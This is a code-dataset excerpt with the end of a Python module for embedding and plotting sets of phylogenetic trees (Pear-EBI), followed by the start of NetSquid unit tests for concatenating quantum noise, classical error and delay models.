Defaults to False.\r\n\r\n Raises:\r\n ValueError: method can only be either pca or tsne for now\r\n\r\n Returns:\r\n plot: either interactive or not\r\n \"\"\"\r\n\r\n # you can surely write something better here @andrear\r\n if type(plot_set) == type(None):\r\n plot_set = self.sets\r\n if method == \"pca\":\r\n if name_plot == None:\r\n name_plot = \"PCA_2D\"\r\n if type(self.embedding_pca2D) == type(None):\r\n self.embed(\"pca\", 2)\r\n fig = graph.plot_embedding(\r\n self.embedding_pca2D,\r\n self.metadata,\r\n 2,\r\n save,\r\n name_plot,\r\n static,\r\n plot_meta,\r\n plot_set,\r\n select,\r\n same_scale,\r\n )\r\n\r\n elif method == \"tsne\":\r\n if name_plot == None:\r\n name_plot = \"TSNE_2D\"\r\n if type(self.embedding_tsne2D) == type(None):\r\n self.embed(\"tsne\", 2)\r\n fig = graph.plot_embedding(\r\n self.embedding_tsne2D,\r\n self.metadata,\r\n 2,\r\n save,\r\n name_plot,\r\n static,\r\n plot_meta,\r\n plot_set,\r\n select,\r\n same_scale,\r\n )\r\n\r\n elif method == \"isomap\":\r\n if name_plot == None:\r\n name_plot = \"ISOMAP_2D\"\r\n if type(self.embedding_isomap2D) == type(None):\r\n self.embed(\"isomap\", 2)\r\n fig = graph.plot_embedding(\r\n self.embedding_isomap2D,\r\n self.metadata,\r\n 2,\r\n save,\r\n name_plot,\r\n static,\r\n plot_meta,\r\n plot_set,\r\n select,\r\n same_scale,\r\n )\r\n\r\n elif method == \"lle\":\r\n if name_plot == None:\r\n name_plot = \"LLE_2D\"\r\n if type(self.embedding_lle2D) == type(None):\r\n self.embed(\"lle\", 2)\r\n fig = graph.plot_embedding(\r\n self.embedding_lle2D,\r\n self.metadata,\r\n 2,\r\n save,\r\n name_plot,\r\n static,\r\n plot_meta,\r\n plot_set,\r\n select,\r\n same_scale,\r\n )\r\n\r\n else:\r\n raise ValueError(\"'method' can only be either 'pca' or 'tsne' \")\r\n\r\n return fig\r\n\r\n def plot_3D(\r\n self,\r\n method,\r\n save=False,\r\n name_plot=None,\r\n static=False,\r\n plot_meta=\"SET-ID\",\r\n plot_set=None,\r\n select=False,\r\n same_scale=False,\r\n z_axis=None,\r\n ):\r\n \"\"\"Plot 3D embedding performed with method of choice\r\n\r\n Args:\r\n method (str): embedding method\r\n save (bool, optional): save plot HTML. Defaults to False.\r\n name_plot (str, optional): name of plot's file. Defaults to None.\r\n static (bool, optional): return less interactive plot. Defaults to False.\r\n plot_meta (str, optional): meta-variale used to color the points. Defaults to \"SET-ID\".\r\n plot_set (list, optional): list of sets to plot from set_collection. Defaults to None.\r\n select (bool, optional): return set of buttons to show or hide specific traces. Defaults to False.\r\n same_scale (bool, optional): use same color_scale for all traces when scale is continuous. 
Defaults to False.\r\n\r\n Raises:\r\n ValueError: method can only be either pca or tsne for now\r\n\r\n Returns:\r\n plot: either interactive or not\r\n \"\"\"\r\n if type(plot_set) == type(None):\r\n plot_set = self.sets\r\n if method == \"pca\":\r\n if name_plot == None:\r\n name_plot = \"PCA_3D\"\r\n if type(self.embedding_pca3D) == type(None):\r\n self.embed(\"pca\", 3)\r\n fig = graph.plot_embedding(\r\n self.embedding_pca3D,\r\n self.metadata,\r\n 3,\r\n save,\r\n name_plot,\r\n static,\r\n plot_meta,\r\n plot_set,\r\n select,\r\n same_scale,\r\n z_axis,\r\n )\r\n\r\n elif method == \"tsne\":\r\n if name_plot == None:\r\n name_plot = \"TSNE_3D\"\r\n if type(self.embedding_tsne3D) == type(None):\r\n self.embed(\"tsne\", 3)\r\n fig = graph.plot_embedding(\r\n self.embedding_tsne3D,\r\n self.metadata,\r\n 3,\r\n save,\r\n name_plot,\r\n static,\r\n plot_meta,\r\n plot_set,\r\n select,\r\n same_scale,\r\n z_axis,\r\n )\r\n\r\n elif method == \"isomap\":\r\n if name_plot == None:\r\n name_plot = \"ISOMAP_3D\"\r\n if type(self.embedding_isomap3D) == type(None):\r\n self.embed(\"isomap\", 3)\r\n fig = graph.plot_embedding(\r\n self.embedding_isomap3D,\r\n self.metadata,\r\n 3,\r\n save,\r\n name_plot,\r\n static,\r\n plot_meta,\r\n plot_set,\r\n select,\r\n same_scale,\r\n z_axis,\r\n )\r\n\r\n elif method == \"lle\":\r\n if name_plot == None:\r\n name_plot = \"LLE_3D\"\r\n if type(self.embedding_lle3D) == type(None):\r\n self.embed(\"lle\", 3)\r\n fig = graph.plot_embedding(\r\n self.embedding_lle3D,\r\n self.metadata,\r\n 3,\r\n save,\r\n name_plot,\r\n static,\r\n plot_meta,\r\n plot_set,\r\n select,\r\n same_scale,\r\n z_axis,\r\n )\r\n\r\n else:\r\n raise ValueError(\"'method' can only be either 'pca' or 'tsne' \")\r\n\r\n return fig\r\n\r\n # ─── GET SUBSET ───────────────────────────────────────────────────────\r\n\r\n def get_subset(self, n_required, method=\"sequence\"):\r\n \"\"\"Gets subset of phylogenetic trees\r\n\r\n Args:\r\n n_required (int): number of points to extract\r\n method (str, optional): method used to extact points ('sequence', 'random', 'syst'). 
Defaults to \"sequence\".\r\n\r\n Returns:\r\n subset plots: 2D and 3D embedding plots of subset\r\n \"\"\"\r\n console = Console()\r\n with console.status(\"[bold blue]Extracting subsample...\") as status:\r\n if method == \"syst\":\r\n if shutil.which(\"pypy3\") is not None:\r\n command = [\r\n \"pypy3\",\r\n f\"{current}/subsample/subsample.py\",\r\n self.file,\r\n str(self.n_trees),\r\n str(n_required),\r\n ]\r\n res = subprocess.check_output(command, universal_newlines=True).split(\r\n \"\\n\"\r\n )\r\n subsample_trees, idxs = eval(res[3]), eval(res[4])\r\n else:\r\n console.log(\r\n \"[bold red]Could not find pypy3 on your sytem PATH - using python3...\"\r\n )\r\n subsample_trees, idxs = subsample.subsample(\r\n self.file, self.n_trees, n_required, subp=False\r\n )\r\n\r\n else:\r\n with open(self.file, \"r\") as f:\r\n trees = list(enumerate(f.readlines()))\r\n f.close()\r\n\r\n if method == \"random\":\r\n selection = random.sample(trees, n_required)\r\n subsample_trees, idxs = list(\r\n map(lambda elem: elem[1], selection)\r\n ), list(map(lambda elem: elem[0], selection))\r\n elif method == \"sequence\":\r\n step = self.metadata.shape[0] // n_required\r\n idxs = [step * (i + 1) - 1 for i in range(n_required)]\r\n subsample_trees = [trees[i][1] for i in idxs]\r\n\r\n else:\r\n sys.exit(f\"Method {method} not available for subsampling\")\r\n\r\n file_sub = f\"SUBSAMPLE\"\r\n with open(file_sub, \"w\") as f:\r\n for i in subsample_trees:\r\n f.write(i)\r\n f.close()\r\n # print(len(subsample_trees), len(idxs))\r\n status.update(\"[bold green]Calculating distances...\")\r\n dM = hashrf.hashrf(file_sub, n_required, file_sub + \"_distances.csv\")\r\n components = PCA_e.pca(dM, 3)\r\n status.update(f\"[bold blue] Done!\")\r\n time.sleep(0.2)\r\n\r\n sorted_elements = sorted(enumerate(idxs), key=lambda x: x[1])\r\n idxs_sorted, order = list(map(lambda x: x[1], sorted_elements)), list(\r\n map(lambda x: x[0], sorted_elements)\r\n )\r\n comp_sorted = np.array([components[line, :] for line in order])\r\n # dM_sorted = np.array([dM[line,:] for line in order])\r\n SetID_sub = self.metadata[\"SET-ID\"][idxs_sorted]\r\n meta_sub = pd.DataFrame({\"SET-ID\": SetID_sub, \"STEP\": idxs_sorted})\r\n\r\n fig1, fig2 = graph.plot_embedding(comp_sorted, meta_sub, 2), graph.plot_embedding(\r\n comp_sorted, meta_sub, 3\r\n )\r\n return fig1, fig2\r\n\r\n\r\n# ──────────────────────────────────────────────────────────────────────────────\r\n# ─────────────────────────────────────────────────── SET_COLLECTION CLASS ─────\r\nclass set_collection(tree_set):\r\n # NB: set_collection is a sub_class of tree_set\r\n # therefore, most methods are shared between these two classes\r\n def __init__(\r\n self,\r\n collection=list(),\r\n file=\"Set_collection_\",\r\n output_file=None,\r\n distance_matrix=None,\r\n metadata=None,\r\n ):\r\n \"\"\"Initialize set_collection\r\n\r\n collection: facultative - tree_set or list of tree_sets\r\n NB: if no collection is given an empty set_collection is generated\r\n file: facultative - file with set of phylogenetic trees in newick format\r\n output_file: facultative - specifies output_file of distance matrix\"\"\"\r\n\r\n self.id = uuid.uuid4()\r\n self.file = file + str(self.id)\r\n self.distance_matrix = (\r\n pd.read_csv(distance_matrix, header=None, index_col=None).values #\r\n if distance_matrix\r\n else distance_matrix\r\n )\r\n self.embedding_pca2D = None\r\n self.embedding_tsne2D = None\r\n self.embedding_pca3D = None\r\n self.embedding_tsne3D = None\r\n\r\n if self.file 
!= \"Set_collection_\" + str(self.id) and output_file is None:\r\n self.output_file = \"{file}_distance_matrix.csv\".format(\r\n file=os.path.splitext(os.path.basename(self.file))[0]\r\n )\r\n elif output_file is None:\r\n self.output_file = \"Set_collection_distance_matrix_\" + str(self.id) + \".csv\"\r\n else:\r\n if output_file[-4:] == \".csv\":\r\n self.output_file = output_file[:-4] + \"_\" + str(self.id) + \".csv\"\r\n else:\r\n self.output_file = output_file + \"_\" + str(self.id) + \".csv\"\r\n\r\n if isinstance(collection, tree_set):\r\n self.collection = [collection]\r\n with open(self.file, \"w\") as trees:\r\n with open(collection.file, \"r\") as file:\r\n trees.write(file.read())\r\n file.close()\r\n trees.close()\r\n\r\n elif len(collection) > 0:\r\n remove = list()\r\n for i, element in enumerate(collection):\r\n if not isinstance(element, tree_set):\r\n if isinstance(element, str):\r\n try:\r\n file = os.path.splitext(os.path.basename(element))[0]\r\n exec(f\"{file} = tree_set('{element}')\")\r\n remove.append(i)\r\n except FileNotFoundError:\r\n sys.exit(f\"File {element} not found\")\r\n except TypeError:\r\n sys.exit(\r\n f\"Set collection can be initialized only with set_collection, tree_set, or file path elements\"\r\n )\r\n exec(f\"collection.append({file})\")\r\n\r\n else:\r\n sys.exit(\r\n f\"Set collection can be initialized only with set_collection, tree_set, or file path elements\"\r\n )\r\n for i in remove[::-1]:\r\n collection.pop(i)\r\n\r\n self.collection = collection\r\n\r\n else:\r\n self.collection = collection\r\n\r\n self.data = dict()\r\n\r\n self.metadata = pd.DataFrame()\r\n self.n_trees = 0\r\n for set in self.collection:\r\n key = os.path.splitext(os.path.basename(set.file))[0]\r\n\r\n metadata = set.metadata\r\n if type(metadata) == type(None):\r\n metadata = pd.DataFrame()\r\n metadata[\"SET-ID\"] = np.array([key] * set.n_trees)\r\n\r\n self.metadata = pd.concat([self.metadata, metadata])\r\n\r\n self.data[key] = {\"metadata\": metadata, \"n_trees\": set.n_trees}\r\n self.n_trees += set.n_trees\r\n\r\n self.metadata.reset_index(drop=True, inplace=True)\r\n\r\n self.sets = np.unique(self.metadata[\"SET-ID\"])\r\n\r\n # ─── CALCULATE DISTANCES ───────────────────────────────────────────────────\r\n def calculate_distances(self, method):\r\n \"\"\"Computes tree_set distance matrix with method of choice\r\n\r\n Args:\r\n method (str): method/algorithm used to compute distance matrix\r\n \"\"\"\r\n methods = {\r\n \"hashrf_RF\": hashrf.hashrf,\r\n \"hashrf_wRF\": hashrf.hashrf_weighted,\r\n \"smart_RF\": maple_RF.calculate_distance_matrix,\r\n \"tqdist_quartet\": tqdist.quartet,\r\n \"tqdist_triplet\": tqdist.triplet,\r\n \"None\": None,\r\n }\r\n\r\n if method in (\"hashrf_RF\", \"hashrf_wRF\", \"tqdist_quartet\", \"tqdist_triplet\"):\r\n with open(self.file, \"w\") as trees:\r\n for set in self.collection:\r\n with open(set.file, \"r\") as file:\r\n trees.write(file.read())\r\n file.close()\r\n trees.close()\r\n\r\n with self.console.status(\"[bold green]Calculating distances...\") as status:\r\n self.distance_matrix = methods[method](\r\n self.file, self.n_trees, self.output_file\r\n )\r\n\r\n if method in (\"hashrf_RF\", \"hashrf_wRF\", \"tqdist_quartet\", \"tqdist_triplet\"):\r\n hashrf.bash_command(f\"rm {self.file}\")\r\n\r\n print(f\"[bold blue]{method} | Done!\")\r\n\r\n # the result of addition between two collections\r\n # is the concatenation of the two collections\r\n def __add__(self, other):\r\n \"\"\"Concatenates two collectionsor 
collection and tree_set\r\n\r\n Args:\r\n other (tree_set ot set_colletion): tree_set ot set_colletion\r\n\r\n Returns:\r\n set_collection: concatenated set_collection\r\n \"\"\"\r\n if isinstance(other, set_collection):\r\n return set_collection(self.collection + other.collection)\r\n elif isinstance(other, tree_set):\r\n return set_collection(self.collection + [other])\r\n else:\r\n remove = list()\r\n for i, element in enumerate(other):\r\n if not isinstance(element, tree_set):\r\n if isinstance(element, str):\r\n try:\r\n file = os.path.splitext(os.path.basename(element))[0]\r\n exec(f\"{file} = tree_set('{element}')\")\r\n remove.append(i)\r\n except FileNotFoundError:\r\n sys.exit(f\"File {element} not found\")\r\n except TypeError:\r\n sys.exit(\r\n \"You can concatenate a set_collection \\\r\n only with another set_collection, a tree_set,\\\r\n or a list of tree_set\"\r\n )\r\n\r\n exec(f\"other.append({file})\")\r\n\r\n else:\r\n sys.exit(\r\n \"You can concatenate a set_collection \\\r\n only with another set_collection, a tree_set,\\\r\n or a list of tree_set\"\r\n )\r\n for i in remove[::-1]:\r\n other.pop(i)\r\n\r\n return set_collection(self.collection + other)\r\n\r\n def __str__(self):\r\n computed = \"not computed\"\r\n if type(self.distance_matrix) != type(None):\r\n computed = \"computed\"\r\n\r\n summary = f\"─────────────────────────────\\\r\n \\n Tree set collection containing {self.n_trees} trees;\\\r\n \\n File: {self.file};\\n Distance matrix: {computed}.\\\r\n \\n───────────────────────────── \\n\"\r\n for key, value in self.data.items():\r\n summary += f\"{key}; Containing {value['n_trees']} trees. \\n\"\r\n\r\n return summary\r\n\r\n # concatenate is a more formal method to concatenate collections\r\n # using this allows for more clarity in the codebase\r\n def concatenate(self, other):\r\n \"\"\"Concatenates two collectionsor collection and tree_set\r\n\r\n Args:\r\n other (tree_set ot set_colletion): tree_set ot set_colletion\r\n\r\n Returns:\r\n set_collection: concatenated set_collection\r\n \"\"\"\r\n if isinstance(other, set_collection):\r\n return set_collection(self.collection + other.collection)\r\n elif isinstance(other, tree_set):\r\n return set_collection(self.collection + [other])\r\n else:\r\n remove = list()\r\n for i, element in enumerate(other):\r\n if not isinstance(element, tree_set):\r\n if isinstance(element, str):\r\n try:\r\n file = os.path.splitext(os.path.basename(element))[0]\r\n exec(f\"{file} = tree_set('{element}')\")\r\n remove.append(i)\r\n except FileNotFoundError:\r\n sys.exit(f\"File {element} not found\")\r\n except TypeError:\r\n sys.exit(\r\n \"You can concatenate a set_collection \\\r\n only with another set_collection, a tree_set,\\\r\n or a list of tree_set\"\r\n )\r\n\r\n exec(f\"other.append({file})\")\r\n\r\n else:\r\n sys.exit(\r\n \"You can concatenate a set_collection \\\r\n only with another set_collection, a tree_set,\\\r\n or a list of tree_set\"\r\n )\r\n for i in remove[::-1]:\r\n other.pop(i)\r\n\r\n return set_collection(self.collection + other)\r\n","repo_name":"AndreaRubbi/Pear-EBI","sub_path":"pear_ebi/tree_set.py","file_name":"tree_set.py","file_ext":"py","file_size_in_byte":33264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"33457317883","text":"# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# \n# File: test_concatenatingmodels.py\n# \n# This file is part of the NetSquid package (https://netsquid.org).\n# It is subject to the NetSquid Software End User License Conditions.\n# A copy of these conditions can be found in the LICENSE.md file of this package.\n# \n# NetSquid Authors\n# ================\n# \n# NetSquid is being developed within [Quantum Internet division](https://qutech.nl/research-engineering/quantum-internet/) at QuTech.\n# QuTech is a collaboration between TNO and the TUDelft.\n# \n# Active authors (alphabetical):\n# \n# - Tim Coopmans (scientific contributor)\n# - Chris Elenbaas (software developer)\n# - David Elkouss (scientific supervisor)\n# - Rob Knegjens (tech lead, software architect)\n# - Iñaki Martin Soroa (software developer)\n# - Julio de Oliveira Filho (software architect)\n# - Ariana Torres Knoop (HPC contributor)\n# - Stephanie Wehner (scientific supervisor)\n# \n# Past authors (alphabetical):\n# \n# - Axel Dahlberg (scientific contributor)\n# - Damian Podareanu (HPC contributor)\n# - Walter de Jong (HPC contributor)\n# - Loek Nijsten (software developer)\n# - Martijn Papendrecht (software developer)\n# - Filip Rozpedek (scientific contributor)\n# - Matt Skrzypczyk (software contributor)\n# - Leon Wubben (software developer)\n# \n# The simulation engine of NetSquid depends on the pyDynAA package,\n# which is developed at TNO by Julio de Oliveira Filho, Rob Knegjens, Coen van Leeuwen, and Joost Adriaanse.\n# \n# Ariana Torres Knoop, Walter de Jong and Damian Podareanu from SURFsara have contributed towards the optimization and parallelization of NetSquid.\n# \n# Hana Jirovska and Chris Elenbaas have built Python packages for MacOS.\n# \n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# This file uses NumPy style docstrings: https://github.com/numpy/numpy/blob/master/doc/HOWTO_DOCUMENT.rst.txt\n\n\"\"\"Unit tests for concatenating different types of models.\n\n\"\"\"\nimport unittest\nimport netsquid as ns\nimport numpy as np\nfrom netsquid.qubits import ketutil as ku\nfrom netsquid.qubits.qubit import Qubit\nfrom netsquid.qubits import qformalism as qform\nfrom netsquid.qubits import qubitapi as qapi\nfrom netsquid.components.models.model import Model, ModelCompositionException\nfrom netsquid.components.models.delaymodels import DelayModel, GaussianDelayModel, FixedDelayModel\nfrom netsquid.components.models.errormodels import ErrorModel\nfrom netsquid.components.models.cerrormodels import ClassicalErrorModel\nfrom netsquid.components.models.qerrormodels import QuantumErrorModel, DepolarNoiseModel, DephaseNoiseModel, \\\n T1T2NoiseModel, FibreLossModel\n\n\nclass NonComposableModel(Model):\n\n def compute_model(self, *args, **kwargs):\n pass\n\n\nclass ExampleModel(Model):\n\n def __init__(self, value=0):\n super().__init__()\n self.value = value\n\n def compute_model(self, items, *args, **kwargs):\n for i in range(len(items)):\n items[i] **= self.value\n\n @classmethod\n def concatenation_class(cls):\n return ExampleModel\n\n\nclass ExampleAddModel(ExampleModel):\n\n def compute_model(self, items, addition=0, *args, **kwargs):\n for i in range(len(items)):\n items[i] += addition\n\n\nclass ExampleMultiplicationModel(ExampleModel):\n def compute_model(self, items, multiplier=1, *args, **kwargs):\n for i in range(len(items)):\n items[i] *= multiplier\n\n\nclass TestConcatModels(unittest.TestCase):\n\n def 
test_init(self):\n \"\"\"Test initialisation of concatenated models \"\"\"\n m1 = ExampleModel(2)\n m2 = ExampleModel(3)\n self.assertEqual(len(m1), 1)\n self.assertFalse(m1.is_concatenated)\n self.assertFalse(m2.is_concatenated)\n m3 = m1 + m2\n self.assertTrue(m3.is_concatenated)\n self.assertEqual(len(m3), 2)\n self.assertIsInstance(m3, ExampleModel)\n self.assertIsInstance(m3, m1.concatenation_class())\n self.assertTrue(m1 in m3)\n self.assertTrue(m2 in m3)\n self.assertFalse(m3 in m2)\n self.assertFalse(m1 in m2)\n\n def test_order(self):\n \"\"\"Test if models are computed in the right order\"\"\"\n m1 = ExampleModel(2)\n m2 = ExampleModel(3)\n m3 = m1 + m2\n self.assertEqual(len(m3), 2)\n self.assertIsInstance(m3, ExampleModel)\n items = [1, 2, 3, 4, 5]\n m3(items)\n self.assertListEqual(items, [1, 4 ** 3, 9 ** 3, 16 ** 3, 25 ** 3])\n m4 = m2 + m1\n self.assertEqual(len(m4), 2)\n self.assertIsInstance(m4, ExampleModel)\n items = [1, 2, 3, 4, 5]\n m4(items)\n self.assertListEqual(items, [1, 8 ** 2, 27 ** 2, 64 ** 2, 125 ** 2])\n\n def test_arguments(self):\n \"\"\"Check if arguments are correctly passed through\"\"\"\n m1 = ExampleAddModel()\n m2 = ExampleMultiplicationModel()\n m3 = m1 + m2\n self.assertEqual(len(m3), 2)\n self.assertIsInstance(m3, ExampleModel)\n items = [1, 2, 3, 4, 5]\n m3(items, addition=4, multiplier=2)\n self.assertListEqual(items, [10, 12, 14, 16, 18])\n\n def test_multiplying(self):\n \"\"\"Test for multiplying models to repeat them\"\"\"\n m1 = ExampleAddModel()\n m2 = ExampleMultiplicationModel()\n m3 = 5 * m1\n self.assertEqual(len(m3), 5)\n self.assertNotIn(m1, m2)\n self.assertIn(m1, m3)\n self.assertNotIn(m3, m1)\n self.assertIsInstance(m3, ExampleModel)\n items = [1, 2, 3, 4, 5]\n m3(items, addition=3)\n self.assertListEqual(items, [16, 17, 18, 19, 20])\n m3 = m1 * 5\n self.assertEqual(len(m3), 5)\n self.assertIn(m1, m3)\n self.assertNotIn(m2, m3)\n self.assertIsInstance(m3, ExampleModel)\n items = [1, 2, 3, 4, 5]\n m3(items, addition=3)\n self.assertListEqual(items, [16, 17, 18, 19, 20])\n m3 = 5 * (m1 + m2) # != 5*m1 + 5*m2 if m1 and m2 are not commutative\n self.assertEqual(len(m3), 10)\n self.assertIn(m1, m3)\n self.assertIn(m2, m3)\n self.assertIsInstance(m3, ExampleModel)\n items = [1, 2, 3, 4, 5]\n expected_list = items[:]\n m3(items, addition=3, multiplier=2)\n for _ in range(5):\n for i in range(len(expected_list)):\n expected_list[i] = (expected_list[i] + 3) * 2\n self.assertListEqual(items, expected_list)\n m3 = 5 * m1 + 5 * m2\n self.assertEqual(len(m3), 10)\n self.assertIn(m1, m3)\n self.assertIn(m2, m3)\n self.assertIsInstance(m3, ExampleModel)\n items = [1, 2, 3, 4, 5]\n expected_list = items[:]\n m3(items, addition=3, multiplier=2)\n for i in range(len(expected_list)):\n expected_list[i] = (expected_list[i] + 5 * 3) * (2 ** 5)\n self.assertListEqual(items, expected_list)\n\n with self.assertRaises(TypeError):\n \"1\" * m1\n with self.assertRaises(TypeError):\n m1 * m2\n with self.assertRaises(TypeError):\n m1 * True\n with self.assertRaises(ValueError):\n m1 * 0\n with self.assertRaises(ValueError):\n m1 * -1\n with self.assertRaises(TypeError):\n m1 * 1.5\n\n def test_adding_not_addable(self):\n \"\"\"Test for trying to add models that can't be added\"\"\"\n with self.assertRaises(ModelCompositionException):\n NonComposableModel() + NonComposableModel()\n with self.assertRaises(ModelCompositionException):\n NonComposableModel() + ExampleMultiplicationModel()\n with self.assertRaises(ModelCompositionException):\n 
ExampleMultiplicationModel() + NonComposableModel()\n with self.assertRaises(ModelCompositionException):\n 4 * NonComposableModel()\n with self.assertRaises(ModelCompositionException):\n NonComposableModel() * 4\n\n x = NonComposableModel()\n self.assertEqual(len(x), 1)\n self.assertIn(x, x)\n y = 1 * x\n z = x * 1\n self.assertIn(z, y)\n self.assertIs(x, y)\n self.assertIs(z, x)\n\n\nclass TestConcatQuantumModels(unittest.TestCase):\n\n def test_depolar_concat(self):\n \"\"\"Test concatenation two depolar noise models\"\"\"\n qform.set_qstate_formalism(qform.QFormalism.DM)\n p1 = 0.7\n p2 = 0.2\n m1 = DepolarNoiseModel(p1, time_independent=True)\n m2 = DepolarNoiseModel(p2, time_independent=True)\n m3 = m1 + m2\n self.assertIsInstance(m3, QuantumErrorModel)\n q = ns.qubits.create_qubits(1)[0]\n m3([q, None])\n p = (1 - (1 - p1) * (1 - p2)) / 2\n self.assertTrue(np.allclose(\n qapi.reduced_dm(q),\n p * ku.ket2dm(ns.s1) + (1 - p) * ku.ket2dm(ns.s0)))\n\n def test_dephase_concat(self):\n \"\"\"Test concatenation two dephase noise models\"\"\"\n qform.set_qstate_formalism(qform.QFormalism.DM)\n p1 = 0.7\n p2 = 0.2\n m1 = DephaseNoiseModel(p1, time_independent=True)\n m2 = DephaseNoiseModel(p2, time_independent=True)\n m3 = m1 + m2\n self.assertIsInstance(m3, QuantumErrorModel)\n q = ns.qubits.create_qubits(1)[0]\n ns.qubits.operate(q, ns.H)\n m3([None, q])\n ns.qubits.operate(q, ns.H)\n p = (1 - (1 - p1) * (1 - p2)) / 2\n self.assertTrue(np.allclose(\n qapi.reduced_dm(q),\n p * ku.ket2dm(ns.s0) + (1 - p) * ku.ket2dm(ns.s1)))\n\n def test_dephase_plus_depolar(self):\n \"\"\"Test concatenation of a depolar with a dephase\"\"\"\n qform.set_qstate_formalism(qform.QFormalism.DM)\n p1 = 0.7\n p2 = 0.2\n m1 = DephaseNoiseModel(p1, time_independent=True)\n m2 = DepolarNoiseModel(p2, time_independent=True)\n m3 = m1 + m2\n self.assertIsInstance(m3, QuantumErrorModel)\n q1, q2 = ns.qubits.create_qubits(2)\n ns.qubits.operate(q1, ns.H)\n ns.qubits.operate(q2, ns.H)\n m1([None, q2])\n m2([None, q2, None])\n m3([q1, None])\n self.assertTrue(np.allclose(qapi.reduced_dm(q1), qapi.reduced_dm(q2)))\n\n def test_concat_T1T2(self):\n \"\"\"Test concatenation two T1T2 noise models\"\"\"\n qform.set_qstate_formalism(qform.QFormalism.DM)\n m1 = T1T2NoiseModel(400, 300)\n m2 = T1T2NoiseModel(200, 120)\n m3 = m1 + m2\n self.assertIsInstance(m3, QuantumErrorModel)\n q1, q2 = ns.qubits.create_qubits(2)\n ns.qubits.operate(q1, ns.H)\n ns.qubits.operate(q2, ns.H)\n m1([None, q2])\n m2([None, q2, None])\n m3([q1, None])\n self.assertTrue(np.allclose(qapi.reduced_dm(q1), qapi.reduced_dm(q2)))\n\n def test_much_concatenation(self):\n \"\"\"Test concatenating lots of quantum error models\"\"\"\n qform.set_qstate_formalism(qform.QFormalism.DM)\n m = {0: T1T2NoiseModel(400), 1: T1T2NoiseModel(T2=120), 2: DephaseNoiseModel(0.44, time_independent=True),\n 3: DepolarNoiseModel(0.44, time_independent=True), 4: T1T2NoiseModel(200, 120), 5: DepolarNoiseModel(0.78),\n 6: DephaseNoiseModel(0.2)}\n big_model = m[0]\n for i in range(1, 6):\n big_model += m[i]\n self.assertIsInstance(big_model, QuantumErrorModel)\n q1, q2 = ns.qubits.create_qubits(2)\n ns.qubits.operate(q1, ns.H)\n ns.qubits.operate(q2, ns.H)\n for model in m.values():\n model([None, q2, None])\n big_model([q1])\n self.assertTrue(np.allclose(qapi.reduced_dm(q1), qapi.reduced_dm(q2)))\n\n def test_loss_model_concat(self):\n \"\"\"Test concatenating loss models\"\"\"\n qform.set_qstate_formalism(qform.QFormalism.DM)\n p1 = 0.2\n p2 = 0.5\n p = p1 + p2 - p1 * p2 # 
probability that a qubit gets lost with two loss models\n m1 = FibreLossModel(p_loss_init=p1)\n m2 = FibreLossModel(p_loss_init=p2)\n m3 = m1 + m2\n self.assertIsInstance(m3, QuantumErrorModel)\n n = 50000\n qubits = ns.qubits.create_qubits(n)\n m3(qubits, length=0)\n nones = 0\n for qubit in qubits:\n if qubit is None:\n nones += 1\n self.assertAlmostEqual(nones, p * n, delta=n / 100)\n\n\nclass ExampleClassicalErrorModel(ClassicalErrorModel):\n def error_operation(self, items, delta_time=0, **kwargs):\n for i in range(len(items)):\n items[i] += 4\n\n\nclass TestConcatErrorModel(unittest.TestCase):\n\n def test_adding_classical_with_quantum(self):\n \"\"\"Test adding a classical with a quantum error model\"\"\"\n m1 = DephaseNoiseModel(0.4)\n m2 = ExampleClassicalErrorModel()\n m3 = m1 + m2\n self.assertIsInstance(m3, ErrorModel)\n\n # Test that doing this is completely useless as everything you input gets rejected by one or the other class\n with self.assertRaises(TypeError):\n m3([Qubit(\"test_qubit\")])\n with self.assertRaises(TypeError):\n m3([\"Test\"])\n\n\nclass TestConcatClassicalErrorModel(unittest.TestCase):\n\n def test_adding_classical(self):\n \"\"\"Test adding a classical error model\"\"\"\n m1 = ExampleClassicalErrorModel()\n m2 = ExampleClassicalErrorModel()\n m3 = m1 + m2\n self.assertIsInstance(m3, ClassicalErrorModel)\n\n with self.assertRaises(TypeError):\n m3([Qubit(\"test_qubit\")])\n\n\nclass TestConcatDelayModels(unittest.TestCase):\n\n def test_adding_delay_model(self):\n \"\"\"Test adding delay models\"\"\"\n m1 = FixedDelayModel(4)\n m2 = GaussianDelayModel(10, 0)\n m3 = m1 + m2 + m1\n self.assertIsInstance(m3, DelayModel)\n\n self.assertEqual(m3(), 18)\n self.assertEqual(m3.generate_delay(), 18)\n self.assertEqual(m3.get_mean(), 18)\n\n with self.assertRaises(ModelCompositionException):\n m3.set_mean(4)\n\n with self.assertRaises(ModelCompositionException):\n m3.get_std()\n\n\n# Test for inheritances\n\nclass TestModel(Model):\n\n def noise_operation(self, qubits, delta_time=0, **kwargs):\n pass\n\n def __init__(self, p=0):\n super().__init__()\n self.p = p\n\n @classmethod\n def concatenation_class(cls):\n return TestModel\n\n def compute_model(self, l):\n if self.is_concatenated:\n for model in self._models:\n l = model(l)\n else:\n l[0] = l[0] ** self.p\n return l\n\n\nclass A(TestModel):\n @classmethod\n def concatenation_class(cls):\n return A\n\n\nclass B(A):\n @classmethod\n def concatenation_class(cls):\n return B\n\n\nclass C(B):\n @classmethod\n def concatenation_class(cls):\n return C\n\n\nclass D(A):\n pass\n\n\nclass E(D):\n @classmethod\n def concatenation_class(cls):\n return E\n\n\nclass F(E):\n @classmethod\n def concatenation_class(cls):\n return F\n\n\nclass G(C, E):\n pass\n\n\nclass TestComposableModels(unittest.TestCase):\n\n def test_concatenation(self):\n \"\"\"Test basic concatenation\"\"\"\n model1 = TestModel()\n model2 = TestModel()\n model3 = TestModel()\n\n model12 = model1 + model2\n self.assertIsInstance(model12, TestModel)\n self.assertEqual(len(model12), 2)\n self.assertTrue(model1 in model12)\n self.assertTrue(model2 in model12)\n self.assertFalse(model12 in model12)\n model123 = model3 + model12\n self.assertIsInstance(model123, TestModel)\n self.assertEqual(len(model123), 3)\n self.assertTrue(model1 in model123)\n self.assertTrue(model2 in model123)\n self.assertTrue(model3 in model123)\n self.assertFalse(model12 in model123)\n # order\n self.assertEqual(model123._concatenated_models[0], model3)\n 
